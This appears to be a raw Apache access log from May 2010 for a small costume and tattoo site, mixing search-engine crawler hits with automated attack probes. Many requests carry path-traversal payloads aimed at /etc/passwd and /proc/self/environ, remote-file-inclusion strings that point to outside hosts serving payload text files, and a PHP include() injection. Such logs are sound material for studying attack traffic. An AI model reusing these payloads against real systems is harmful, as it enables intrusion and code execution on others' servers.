87.250.255.243 - - [20/May/2010:01:53:22 -0500] "GET /logs/access_log.1214870400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.105.40.177 - - [20/May/2010:01:54:01 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
174.132.224.66 - - [20/May/2010:01:54:32 -0500] "GET /logs/access_log.1273276800///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:01:54:32 -0500] "GET ///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1004 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:01:54:32 -0500] "GET /logs///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6279 "-""libwww-perl/5.823"
74.55.128.226 - - [20/May/2010:01:56:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
174.132.224.66 - - [20/May/2010:01:56:50 -0500] "GET /logs/access_log.1273363200///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.823"
87.250.255.243 - - [20/May/2010:01:58:02 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:01:58:11 -0500] "GET /logs/access_log.1211500800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.132.224.66 - - [20/May/2010:01:58:42 -0500] "GET /logs/access_log.1273276800///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:01:58:43 -0500] "GET ///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1004 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:01:58:43 -0500] "GET /logs///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6279 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:02:00:18 -0500] "GET /logs/access_log.1273363200///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.823"
87.250.255.243 - - [20/May/2010:02:02:41 -0500] "GET /logs/access_log.1156636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.12.119.174 - - [20/May/2010:02:04:12 -0500] "GET /logs/access_log.1263081600//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:04:12 -0500] "GET /logs/access_log.1264723200//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:04:12 -0500] "GET /logs//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:04:12 -0500] "GET //admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:05:01 -0500] "GET //admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:05:01 -0500] "GET /logs//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:05:01 -0500] "GET /logs/access_log.1263081600//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.12.119.174 - - [20/May/2010:02:05:02 -0500] "GET /logs/access_log.1264723200//admin.lib.inc.php?site_path=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.55.128.226 - - [20/May/2010:02:05:02 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
74.55.128.226 - - [20/May/2010:02:05:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
74.55.128.226 - - [20/May/2010:02:05:03 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
87.250.255.243 - - [20/May/2010:02:08:16 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.143.84.59 - - [20/May/2010:02:08:39 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
83.143.84.59 - - [20/May/2010:02:08:39 -0500] "GET /logs/access_log.1266451200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.143.84.59 - - [20/May/2010:02:08:39 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
74.55.128.226 - - [20/May/2010:02:11:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
74.55.128.226 - - [20/May/2010:02:11:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
74.55.128.226 - - [20/May/2010:02:11:25 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
66.249.65.51 - - [20/May/2010:02:15:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.49 - - [20/May/2010:02:16:35 -0500] "GET /logs/access_log.1161216000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:02:16:42 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
193.252.118.175 - - [20/May/2010:02:17:07 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
87.250.255.243 - - [20/May/2010:02:22:17 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:02:26:01 -0500] "GET /logs/access_log.1171497600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:02:28:33 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:28:33 -0500] "GET /logs/access_log.1265587200/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:28:35 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:28:45 -0500] "GET /logs/access_log.1265587200/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:28:45 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:28:46 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.18.19.146 - - [20/May/2010:02:32:07 -0500] "GET /logs/index.php?option=voy_window_blue&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:32:07 -0500] "GET /logs/index.php?option=voy_window_blue&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:32:07 -0500] "GET /index.php?option=voy_window_blue&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:32:07 -0500] "GET /index.php?option=voy_window_blue&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:02:32:49 -0500] "GET /logs/access_log.1158710400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.18.19.146 - - [20/May/2010:02:33:05 -0500] "GET /logs/index.php?option=dle_config_api&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:33:06 -0500] "GET /index.php?option=dle_config_api&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:33:06 -0500] "GET /logs/index.php?option=dle_config_api&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:02:33:06 -0500] "GET /index.php?option=dle_config_api&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [20/May/2010:02:33:54 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [20/May/2010:02:34:24 -0500] "GET /logs/access_log.1264982400/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.195.112.180 - - [20/May/2010:02:34:44 -0500] "GET /logs/access_log.1265587200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.109.108.186 - - [20/May/2010:02:34:53 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:02:34:53 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:02:34:53 -0500] "GET /logs/access_log.1272585600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:02:35:44 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:02:35:45 -0500] "GET /logs/access_log.1264982400/index/wp-content/plugins/Enigma2.php?boarddir=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:02:35:49 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:02:35:49 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:02:35:49 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.195.223 - - [20/May/2010:02:40:05 -0500] "GET /logs/access_log.1254268800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:02:40:15 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [20/May/2010:02:41:05 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:02:41:05 -0500] "GET /logs/access_log.1262649600//mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:02:41:06 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:02:41:09 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:02:41:09 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:02:41:09 -0500] "GET /logs/access_log.1262649600//mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.121.158.8 - - [20/May/2010:02:42:05 -0500] "GET /logs/index.php?option=com_webeecomment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:02:42:05 -0500] "GET /logs/index.php?option=com_webeecomment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:02:42:06 -0500] "GET /index.php?option=com_webeecomment&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [20/May/2010:02:42:06 -0500] "GET /index.php?option=com_webeecomment&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
207.46.199.38 - - [20/May/2010:02:45:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.38 - - [20/May/2010:02:45:05 -0500] "GET /logs/access_log.1208736000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [20/May/2010:02:45:39 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/May/2010:02:45:50 -0500] "GET /logs/access_log.1204243200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.142.61.152 - - [20/May/2010:02:46:42 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://marcelotdf.com.ar/logs/ts?? HTTP/1.1" 404 333 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.142.61.152 - - [20/May/2010:02:46:42 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://marcelotdf.com.ar/logs/ts?? HTTP/1.1" 404 328 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
213.92.118.159 - - [20/May/2010:02:47:37 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:47:37 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:47:37 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:48:38 -0500] "GET /logs/access_log.1273363200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:48:42 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:49:08 -0500] "GET /logs/access_log.1272067200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:49:08 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:49:08 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:49:08 -0500] "GET /logs/access_log.1270857600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:02:49:09 -0500] "GET /logs/access_log.1270512000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:02:52:20 -0500] "GET /logs/access_log.1176854400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.201 - - [20/May/2010:02:52:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.52 - - [20/May/2010:02:54:05 -0500] "GET /logs/access_log.1215475200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:02:56:58 -0500] "GET /logs/access_log.1184716800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.227 - - [20/May/2010:03:00:05 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.48.202.44 - - [20/May/2010:03:01:50 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:01:50 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:01:54 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:01:55 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:01:55 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:01:55 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:02:09 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:02:12 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.231.52 - - [20/May/2010:03:03:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.231.52 - - [20/May/2010:03:03:32 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.231.52 - - [20/May/2010:03:03:39 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:03:04:26 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.245.220.19 - - [20/May/2010:03:05:54 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:05:54 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:05:54 -0500] "GET /logs/access_log.1266019200//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:05:54 -0500] "GET /logs/access_log.1265414400//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.80.193.38 - - [20/May/2010:03:06:54 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; ZangoToolbar 4.8.2)"
216.245.220.19 - - [20/May/2010:03:07:00 -0500] "GET /logs/access_log.1266019200//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:07:00 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:07:00 -0500] "GET /logs/access_log.1265414400//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:03:07:00 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:03:09:42 -0500] "GET /logs/access_log.1270857600%20%20/home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:03:09:42 -0500] "GET /logs/home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:03:09:42 -0500] "GET /home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
207.46.199.55 - - [20/May/2010:03:10:05 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.48.202.44 - - [20/May/2010:03:10:25 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:03:10:28 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.circlelogisticservices.co.uk/logs/Djarum/doc/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:03:12:02 -0500] "GET /logs/access_log.1195603200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.245.160.200 - - [20/May/2010:03:12:43 -0500] "GET /home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:03:12:43 -0500] "GET /logs/access_log.1270857600%20%20/home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:03:12:43 -0500] "GET /logs/home.php?pagina=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.46.204.195 - - [20/May/2010:03:14:05 -0500] "GET /logs/access_log.1259280000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.49 - - [20/May/2010:03:15:35 -0500] "GET /logs/access_log.1226620800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.180.203.200 - - [20/May/2010:03:15:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
119.63.198.57 - - [20/May/2010:03:16:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
125.248.34.130 - - [20/May/2010:03:16:41 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:03:16:41 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
